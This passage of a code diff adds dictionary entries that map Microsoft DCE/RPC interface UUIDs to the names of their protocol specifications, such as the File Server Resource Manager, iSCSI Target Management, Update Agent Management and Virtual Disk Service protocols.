+'EDE0150F-E9A3-419C-877C-01FE5D24C5D3':'[MS-FSRM]: File Server Resource Manager Protocol',
+'15A81350-497D-4ABA-80E9-D4DBCC5521FE':'[MS-FSRM]: File Server Resource Manager Protocol',
+'12937789-E247-4917-9C20-F3EE9C7EE783':'[MS-FSRM]: File Server Resource Manager Protocol',
+'F76FBF3B-8DDD-4B42-B05A-CB1C3FF1FEE8':'[MS-FSRM]: File Server Resource Manager Protocol',
+'CB0DF960-16F5-4495-9079-3F9360D831DF':'[MS-FSRM]: File Server Resource Manager Protocol',
+'4846CB01-D430-494F-ABB4-B1054999FB09':'[MS-FSRM]: File Server Resource Manager Protocol',
+'6CD6408A-AE60-463B-9EF1-E117534D69DC':'[MS-FSRM]: File Server Resource Manager Protocol',
+'EE321ECB-D95E-48E9-907C-C7685A013235':'[MS-FSRM]: File Server Resource Manager Protocol',
+'38E87280-715C-4C7D-A280-EA1651A19FEF':'[MS-FSRM]: File Server Resource Manager Protocol',
+'BEE7CE02-DF77-4515-9389-78F01C5AFC1A':'[MS-FSRM]: File Server Resource Manager Protocol',
+'9A2BF113-A329-44CC-809A-5C00FCE8DA40':'[MS-FSRM]: File Server Resource Manager Protocol',
+'4173AC41-172D-4D52-963C-FDC7E415F717':'[MS-FSRM]: File Server Resource Manager Protocol',
+'AD55F10B-5F11-4BE7-94EF-D9EE2E470DED':'[MS-FSRM]: File Server Resource Manager Protocol',
+'BB36EA26-6318-4B8C-8592-F72DD602E7A5':'[MS-FSRM]: File Server Resource Manager Protocol',
+'FF4FA04E-5A94-4BDA-A3A0-D5B4D3C52EBA':'[MS-FSRM]: File Server Resource Manager Protocol',
+'22BCEF93-4A3F-4183-89F9-2F8B8A628AEE':'[MS-FSRM]: File Server Resource Manager Protocol',
+'6879CAF9-6617-4484-8719-71C3D8645F94':'[MS-FSRM]: File Server Resource Manager Protocol',
+'5F6325D3-CE88-4733-84C1-2D6AEFC5EA07':'[MS-FSRM]: File Server Resource Manager Protocol',
+'8BB68C7D-19D8-4FFB-809E-BE4FC1734014':'[MS-FSRM]: File Server Resource Manager Protocol',
+'A2EFAB31-295E-46BB-B976-E86D58B52E8B':'[MS-FSRM]: File Server Resource Manager Protocol',
+'0770687E-9F36-4D6F-8778-599D188461C9':'[MS-FSRM]: File Server Resource Manager Protocol',
+'AFC052C2-5315-45AB-841B-C6DB0E120148':'[MS-FSRM]: File Server Resource Manager Protocol',
+'515C1277-2C81-440E-8FCF-367921ED4F59':'[MS-FSRM]: File Server Resource Manager Protocol',
+'D2DC89DA-EE91-48A0-85D8-CC72A56F7D04':'[MS-FSRM]: File Server Resource Manager Protocol',
+'47782152-D16C-4229-B4E1-0DDFE308B9F6':'[MS-FSRM]: File Server Resource Manager Protocol',
+'205BEBF8-DD93-452A-95A6-32B566B35828':'[MS-FSRM]: File Server Resource Manager Protocol',
+'1BB617B8-3886-49DC-AF82-A6C90FA35DDA':'[MS-FSRM]: File Server Resource Manager Protocol',
+'42DC3511-61D5-48AE-B6DC-59FC00C0A8D6':'[MS-FSRM]: File Server Resource Manager Protocol',
+'426677D5-018C-485C-8A51-20B86D00BDC4':'[MS-FSRM]: File Server Resource Manager Protocol',
+'E946D148-BD67-4178-8E22-1C44925ED710':'[MS-FSRM]: File Server Resource Manager Protocol',
+'D646567D-26AE-4CAA-9F84-4E0AAD207FCA':'[MS-FSRM]: File Server Resource Manager Protocol',
+'F82E5729-6ABA-4740-BFC7-C7F58F75FB7B':'[MS-FSRM]: File Server Resource Manager Protocol',
+'2DBE63C4-B340-48A0-A5B0-158E07FC567E':'[MS-FSRM]: File Server Resource Manager Protocol',
+'A8E0653C-2744-4389-A61D-7373DF8B2292':'[MS-FSRVP]: File Server Remote VSS Protocol',
+'B9785960-524F-11DF-8B6D-83DCDED72085':'[MS-GKDI]: Group Key Distribution Protocol',
+'91AE6020-9E3C-11CF-8D7C-00AA00C091BE':'[MS-ICPR]: ICertPassage Remote Protocol',
+'E8FB8620-588F-11D2-9D61-00C04F79C5FE':'[MS-IISS]: Internet Information Services (IIS) ServiceControl',
+'F612954D-3B0B-4C56-9563-227B7BE624B4':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',
+'8298D101-F992-43B7-8ECA-5052D885B995':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',
+'29822AB8-F302-11D0-9953-00C04FD919C1':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',
+'70B51430-B6CA-11D0-B9B9-00A0C922E750':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',
+'29822AB7-F302-11D0-9953-00C04FD919C1':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',
+'BD0C73BC-805B-4043-9C30-9A28D64DD7D2':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',
+'7C4E1804-E342-483D-A43E-A850CFCC8D18':'[MS-IMSA]: Internet Information Services (IIS) IMSAdminBaseW',
+'6619A740-8154-43BE-A186-0319578E02DB':'[MS-IOI]: IManagedObject Interface Protocol',
+'8165B19E-8D3A-4D0B-80C8-97DE310DB583':'[MS-IOI]: IManagedObject Interface Protocol',
+'C3FCC19E-A970-11D2-8B5A-00A0C9B7C9C4':'[MS-IOI]: IManagedObject Interface Protocol',
+'82AD4280-036B-11CF-972C-00AA006887B0':'[MS-IRP]: Internet Information Services (IIS) Inetinfo Remote',
+'4E65A71E-4EDE-4886-BE67-3C90A08D1F29':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'866A78BC-A2FB-4AC4-94D5-DB3041B4ED75':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'B0D1AC4B-F87A-49B2-938F-D439248575B2':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'E141FD54-B79E-4938-A6BB-D523C3D49FF1':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'40CC8569-6D23-4005-9958-E37F08AE192B':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'1822A95E-1C2B-4D02-AB25-CC116DD9DBDE':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'B4FA8E86-2517-4A88-BD67-75447219EEE4':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'3C73848A-A679-40C5-B101-C963E67F9949':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'66C9B082-7794-4948-839A-D8A5A616378F':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'01454B97-C6A5-4685-BEA8-9779C88AB990':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'D6BD6D63-E8CB-4905-AB34-8A278C93197A':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'348A0821-69BB-4889-A101-6A9BDE6FA720':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'703E6B03-7AD1-4DED-BA0D-E90496EBC5DE':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'100DA538-3F4A-45AB-B852-709148152789':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'592381E5-8D3C-42E9-B7DE-4E77A1F75AE4':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'883343F1-CEED-4E3A-8C1B-F0DADFCE281E':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'6AEA6B26-0680-411D-8877-A148DF3087D5':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'D71B2CAE-33E8-4567-AE96-3CCF31620BE2':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'8C58F6B3-4736-432A-891D-389DE3505C7C':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'1995785D-2A1E-492F-8923-E621EACA39D9':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'C10A76D8-1FE4-4C2F-B70D-665265215259':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'8D7AE740-B9C5-49FC-A11E-89171907CB86':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'8AD608A4-6C16-4405-8879-B27910A68995':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'B0076FEC-A921-4034-A8BA-090BC6D03BDE':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'640038F1-D626-40D8-B52B-09660601D045':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'BB39E296-AD26-42C5-9890-5325333BB11E':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'B06A64E3-814E-4FF9-AFAC-597AD32517C7':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'A5ECFC73-0013-4A9E-951C-59BF9735FDDA':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'1396DE6F-A794-4B11-B93F-6B69A5B47BAE':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'DD6F0A28-248F-4DD3-AFE9-71AED8F685C4':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'52BA97E7-9364-4134-B9CB-F8415213BDD8':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'E2842C88-07C3-4EB0-B1A9-D3D95E76FEF2':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'312CC019-D5CD-4CA7-8C10-9E0A661F147E':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'345B026B-5802-4E38-AC75-795E08B0B83F':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'442931D5-E522-4E64-A181-74E98A4E1748':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'1B1C4D1C-ABC4-4D3A-8C22-547FBA3AA8A0':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'56E65EA5-CDFF-4391-BA76-006E42C2D746':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'E645744B-CAE5-4712-ACAF-13057F7195AF':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'FE7F99F9-1DFB-4AFB-9D00-6A8DD0AABF2C':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'81FE3594-2495-4C91-95BB-EB5785614EC7':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'F093FE3D-8131-4B73-A742-EF54C20B337B':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'28BC8D5E-CA4B-4F54-973C-ED9622D2B3AC':'[MS-ISTM]: iSCSI Software Target Management Protocol',
+'22E5386D-8B12-4BF0-B0EC-6A1EA419E366':'[MS-LREC]: Live Remote Event Capture (LREC) Protocol',
+'12345778-1234-ABCD-EF00-0123456789AB':'[MS-LSAD]: Local Security Authority (Domain Policy) Remote Protocol',
+'12345778-1234-ABCD-EF00-0123456789AB':'[MS-LSAT]: Local Security Authority (Translation Methods) Remote',
+'708CCA10-9569-11D1-B2A5-0060977D8118':'[MS-MQDS]: Message Queuing (MSMQ):',
+'77DF7A80-F298-11D0-8358-00A024C480A8':'[MS-MQDS]: Message Queuing (MSMQ):',
+'76D12B80-3467-11D3-91FF-0090272F9EA3':'[MS-MQMP]: Message Queuing (MSMQ):',
+'FDB3A030-065F-11D1-BB9B-00A024EA5525':'[MS-MQMP]: Message Queuing (MSMQ):',
+'41208EE0-E970-11D1-9B9E-00E02C064C39':'[MS-MQMR]: Message Queuing (MSMQ):',
+'1088A980-EAE5-11D0-8D9B-00A02453C337':'[MS-MQQP]: Message Queuing (MSMQ):',
+'1A9134DD-7B39-45BA-AD88-44D01CA47F28':'[MS-MQRR]: Message Queuing (MSMQ):',
+'17FDD703-1827-4E34-79D4-24A55C53BB37':'[MS-MSRP]: Messenger Service Remote Protocol',
+'12345678-1234-ABCD-EF00-01234567CFFB':'[MS-NRPC]: Netlogon Remote Protocol',
+'00020411-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',
+'00020401-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',
+'00020403-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',
+'00020412-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',
+'00020402-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',
+'00020400-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',
+'00020404-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',
+'784B693D-95F3-420B-8126-365C098659F2':'[MS-OCSPA]: Microsoft OCSP Administration Protocol',
+'AE33069B-A2A8-46EE-A235-DDFD339BE281':'[MS-PAN]: Print System Asynchronous Notification Protocol',
+'0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1':'[MS-PAN]: Print System Asynchronous Notification Protocol',
+'76F03F96-CDFD-44FC-A22C-64950A001209':'[MS-PAR]: Print System Asynchronous Remote Protocol',
+'DA5A86C5-12C2-4943-AB30-7F74A813D853':'[MS-PCQ]: Performance Counter Query Protocol',
+'03837510-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837543-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837533-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837541-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837544-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837524-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'0383753A-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837534-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'0383750B-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'0383751A-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837512-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'0383753D-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837506-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837520-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'038374FF-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837514-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837502-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'03837516-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',
+'0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7':'[MS-RAA]: Remote Authorization API Protocol',
+'F120A684-B926-447F-9DF4-C966CB785648':'[MS-RAI]: Remote Assistance Initiation Protocol',
+'833E4010-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol',
+'833E4200-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol',
+'3C3A70A7-A468-49B9-8ADA-28E11FCCAD5D':'[MS-RAI]: Remote Assistance Initiation Protocol',
+'833E4100-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol',
+'833E41AA-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol',
+'C323BE28-E546-4C23-A81B-D6AD8D8FAC7B':'[MS-RAINPS]: Remote Administrative Interface:',
+'83E05BD5-AEC1-4E58-AE50-E819C7296F67':'[MS-RAINPS]: Remote Administrative Interface:',
+'45F52C28-7F9F-101A-B52B-08002B2EFABE':'[MS-RAIW]: Remote Administrative Interface:',
+'811109BF-A4E1-11D1-AB54-00A0C91E9B45':'[MS-RAIW]: Remote Administrative Interface:',
+'A35AF600-9CF4-11CD-A076-08002B2BD711':'[MS-RDPESC]: Remote Desktop Protocol:',
+'12345678-1234-ABCD-EF00-0123456789AB':'[MS-RPRN]: Print System Remote Protocol',
+'66A2DB21-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'66A2DB1B-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'66A2DB20-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'66A2DB22-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'8F09F000-B7ED-11CE-BBD2-00001A181CAD':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'5FF9BDF6-BD91-4D8B-A614-D6317ACC8DD8':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'20610036-FA22-11CF-9823-00A0C911E5DF':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'67E08FC2-2984-4B62-B92E-FC1AAE64BBBB':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'6139D8A4-E508-4EBB-BAC7-D7F275145897':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',
+'338CD001-2244-31F1-AAAA-900038001003':'[MS-RRP]: Windows Remote Registry Protocol',
+'3BBED8D9-2C9A-4B21-8936-ACB2F995BE6C':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'8DA03F40-3419-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'D61A27C6-8F53-11D0-BFA0-00A024151983':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'081E7188-C080-4FF3-9238-29F66D6CABFD':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'895A2C86-270D-489D-A6C0-DC2A9B35280E':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'D02E4BE0-3419-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'DB90832F-6910-4D46-9F5E-9FD6BFA73903':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'4E934F30-341A-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'879C8BBE-41B0-11D1-BE11-00C04FB6BF70':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'00000000-0000-0000-C000-000000000046':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'69AB7050-3059-11D1-8FAF-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'7D07F313-A53F-459A-BB12-012C15B1846E':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'BB39332C-BFEE-4380-AD8A-BADC8AFF5BB6':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'B057DC50-3059-11D1-8FAF-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',
+'894DE0C0-0D55-11D3-A322-00C04FA321A1':'[MS-RSP]: Remote Shutdown Protocol',
+'D95AFE70-A6D5-4259-822E-2C84DA1DDB0D':'[MS-RSP]: Remote Shutdown Protocol',
+'12345778-1234-ABCD-EF00-0123456789AC':'[MS-SAMR]: Security Account Manager (SAM) Remote Protocol',
+'01954E6B-9254-4E6E-808C-C9E05D007696':'[MS-SCMP]: Shadow Copy Management Protocol',
+'FA7DF749-66E7-4986-A27F-E2F04AE53772':'[MS-SCMP]: Shadow Copy Management Protocol',
+'214A0F28-B737-4026-B847-4F9E37D79529':'[MS-SCMP]: Shadow Copy Management Protocol',
+'AE1C7110-2F60-11D3-8A39-00C04F72D8E3':'[MS-SCMP]: Shadow Copy Management Protocol',
+'367ABB81-9844-35F1-AD32-98F038001003':'[MS-SCMR]: Service Control Manager Remote Protocol',
+'4B324FC8-1670-01D3-1278-5A47BF6EE188':'[MS-SRVS]: Server Service Remote Protocol',
+'CCD8C074-D0E5-4A40-92B4-D074FAA6BA28':'[MS-SWN]: Service Witness Protocol',
+'1A1BB35F-ABB8-451C-A1AE-33D98F1BEF4A':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',
+'1C60A923-2D86-46AA-928A-E7F3E37577AF':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',
+'FDF8A2B9-02DE-47F4-BC26-AA85AB5E5267':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',
+'112B1DFF-D9DC-41F7-869F-D67FEE7CB591':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',
+'152EA2A8-70DC-4C59-8B2A-32AA3CA0DCAC':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',
+'16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',
+'3C745A97-F375-4150-BE17-5950F694C699':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',
+'2F5F6521-CA47-1068-B319-00DD010662DB':'[MS-TRP]: Telephony Remote Protocol',
+'2F5F6520-CA46-1067-B319-00DD010662DA':'[MS-TRP]: Telephony Remote Protocol',
+'1FF70682-0A51-30E8-076D-740BE8CEE98B':'[MS-TSCH]: Task Scheduler Service Remoting Protocol',
+'378E52B0-C0A9-11CF-822D-00AA0051E40F':'[MS-TSCH]: Task Scheduler Service Remoting Protocol',
+'86D35949-83C9-4044-B424-DB363231FD0C':'[MS-TSCH]: Task Scheduler Service Remoting Protocol',
+'44E265DD-7DAF-42CD-8560-3CDB6E7A2729':'[MS-TSGU]: Terminal Services Gateway Server Protocol',
+'034634FD-BA3F-11D1-856A-00A0C944138C':'[MS-TSRAP]: Telnet Server Remote Administration Protocol',
+'497D95A6-2D27-4BF5-9BBD-A6046957133C':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',
+'11899A43-2B68-4A76-92E3-A3D6AD8C26CE':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',
+'5CA4A760-EBB1-11CF-8611-00A0245420ED':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',
+'BDE95FDF-EEE0-45DE-9E12-E5A61CD0D4FE':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',
+'484809D6-4239-471B-B5BC-61DF8C23AC48':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',
+'88143FD0-C28D-4B2B-8FEF-8D882F6A9390':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',
+'1257B580-CE2F-4109-82D6-A9459D0BF6BC':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',
+'53B46B02-C73B-4A3E-8DEE-B16B80672FC0':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',
+'DDE02280-12B3-4E0B-937B-6747F6ACB286':'[MS-UAMG]: Update Agent Management Protocol',
+'112EDA6B-95B3-476F-9D90-AEE82C6B8181':'[MS-UAMG]: Update Agent Management Protocol',
+'144FE9B0-D23D-4A8B-8634-FB4457533B7A':'[MS-UAMG]: Update Agent Management Protocol',
+'70CF5C82-8642-42BB-9DBC-0CFD263C6C4F':'[MS-UAMG]: Update Agent Management Protocol',
+'49EBD502-4A96-41BD-9E3E-4C5057F4250C':'[MS-UAMG]: Update Agent Management Protocol',
+'7C907864-346C-4AEB-8F3F-57DA289F969F':'[MS-UAMG]: Update Agent Management Protocol',
+'46297823-9940-4C09-AED9-CD3EA6D05968':'[MS-UAMG]: Update Agent Management Protocol',
+'4CBDCB2D-1589-4BEB-BD1C-3E582FF0ADD0':'[MS-UAMG]: Update Agent Management Protocol',
+'8F45ABF1-F9AE-4B95-A933-F0F66E5056EA':'[MS-UAMG]: Update Agent Management Protocol',
+'6A92B07A-D821-4682-B423-5C805022CC4D':'[MS-UAMG]: Update Agent Management Protocol',
+'54A2CB2D-9A0C-48B6-8A50-9ABB69EE2D02':'[MS-UAMG]: Update Agent Management Protocol',
+'0D521700-A372-4BEF-828B-3D00C10ADEBD':'[MS-UAMG]: Update Agent Management Protocol',
+'C2BFB780-4539-4132-AB8C-0A8772013AB6':'[MS-UAMG]: Update Agent Management Protocol',
+'1518B460-6518-4172-940F-C75883B24CEB':'[MS-UAMG]: Update Agent Management Protocol',
+'81DDC1B8-9D35-47A6-B471-5B80F519223B':'[MS-UAMG]: Update Agent Management Protocol',
+'BC5513C8-B3B8-4BF7-A4D4-361C0D8C88BA':'[MS-UAMG]: Update Agent Management Protocol',
+'C1C2F21A-D2F4-4902-B5C6-8A081C19A890':'[MS-UAMG]: Update Agent Management Protocol',
+'07F7438C-7709-4CA5-B518-91279288134E':'[MS-UAMG]: Update Agent Management Protocol',
+'C97AD11B-F257-420B-9D9F-377F733F6F68':'[MS-UAMG]: Update Agent Management Protocol',
+'3A56BFB8-576C-43F7-9335-FE4838FD7E37':'[MS-UAMG]: Update Agent Management Protocol',
+'615C4269-7A48-43BD-96B7-BF6CA27D6C3E':'[MS-UAMG]: Update Agent Management Protocol',
+'004C6A2B-0C19-4C69-9F5C-A269B2560DB9':'[MS-UAMG]: Update Agent Management Protocol',
+'7366EA16-7A1A-4EA2-B042-973D3E9CD99B':'[MS-UAMG]: Update Agent Management Protocol',
+'A376DD5E-09D4-427F-AF7C-FED5B6E1C1D6':'[MS-UAMG]: Update Agent Management Protocol',
+'23857E3C-02BA-44A3-9423-B1C900805F37':'[MS-UAMG]: Update Agent Management Protocol',
+'B383CD1A-5CE9-4504-9F63-764B1236F191':'[MS-UAMG]: Update Agent Management Protocol',
+'76B3B17E-AED6-4DA5-85F0-83587F81ABE3':'[MS-UAMG]: Update Agent Management Protocol',
+'0BB8531D-7E8D-424F-986C-A0B8F60A3E7B':'[MS-UAMG]: Update Agent Management Protocol',
+'91CAF7B0-EB23-49ED-9937-C52D817F46F7':'[MS-UAMG]: Update Agent Management Protocol',
+'673425BF-C082-4C7C-BDFD-569464B8E0CE':'[MS-UAMG]: Update Agent Management Protocol',
+'EFF90582-2DDC-480F-A06D-60F3FBC362C3':'[MS-UAMG]: Update Agent Management Protocol',
+'D9A59339-E245-4DBD-9686-4D5763E39624':'[MS-UAMG]: Update Agent Management Protocol',
+'9B0353AA-0E52-44FF-B8B0-1F7FA0437F88':'[MS-UAMG]: Update Agent Management Protocol',
+'503626A3-8E14-4729-9355-0FE664BD2321':'[MS-UAMG]: Update Agent Management Protocol',
+'85713FA1-7796-4FA2-BE3B-E2D6124DD373':'[MS-UAMG]: Update Agent Management Protocol',
+'816858A4-260D-4260-933A-2585F1ABC76B':'[MS-UAMG]: Update Agent Management Protocol',
+'27E94B0D-5139-49A2-9A61-93522DC54652':'[MS-UAMG]: Update Agent Management Protocol',
+'E7A4D634-7942-4DD9-A111-82228BA33901':'[MS-UAMG]: Update Agent Management Protocol',
+'D40CFF62-E08C-4498-941A-01E25F0FD33C':'[MS-UAMG]: Update Agent Management Protocol',
+'ED8BFE40-A60B-42EA-9652-817DFCFA23EC':'[MS-UAMG]: Update Agent Management Protocol',
+'A7F04F3C-A290-435B-AADF-A116C3357A5C':'[MS-UAMG]: Update Agent Management Protocol',
+'4A2F5C31-CFD9-410E-B7FB-29A653973A0F':'[MS-UAMG]: Update Agent Management Protocol',
+'BE56A644-AF0E-4E0E-A311-C1D8E695CBFF':'[MS-UAMG]: Update Agent Management Protocol',
+'918EFD1E-B5D8-4C90-8540-AEB9BDC56F9D':'[MS-UAMG]: Update Agent Management Protocol',
+'04C6895D-EAF2-4034-97F3-311DE9BE413A':'[MS-UAMG]: Update Agent Management Protocol',
+'15FC031C-0652-4306-B2C3-F558B8F837E2':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'4DBCEE9A-6343-4651-B85F-5E75D74D983C':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'1E062B84-E5E6-4B4B-8A25-67B81E8F13E8':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'2ABD757F-2851-4997-9A13-47D2A885D6CA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'9CBE50CA-F2D2-4BF4-ACE1-96896B729625':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'4DAA0135-E1D1-40F1-AAA5-3CC1E53221C3':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'3858C0D5-0F35-4BF5-9714-69874963BC36':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'40F73C8B-687D-4A13-8D96-3D7F2E683936':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'8F4B2F5D-EC15-4357-992F-473EF10975B9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'FC5D23E8-A88B-41A5-8DE0-2D2F73C5A630':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'B07FEDD4-1682-4440-9189-A39B55194DC5':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'72AE6713-DCBB-4A03-B36B-371F6AC6B53D':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'B6B22DA8-F903-4BE7-B492-C09D875AC9DA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'538684E0-BA3D-4BC0-ACA9-164AFF85C2A9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'75C8F324-F715-4FE3-A28E-F9011B61A4A1':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'90681B1D-6A7F-48E8-9061-31B7AA125322':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'9882F547-CFC3-420B-9750-00DFBEC50662':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'83BFB87F-43FB-4903-BAA6-127F01029EEC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'EE2D5DED-6236-4169-931D-B9778CE03DC6':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
+'9723F420-9355-42DE-AB66-E31BB15BEEAC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',
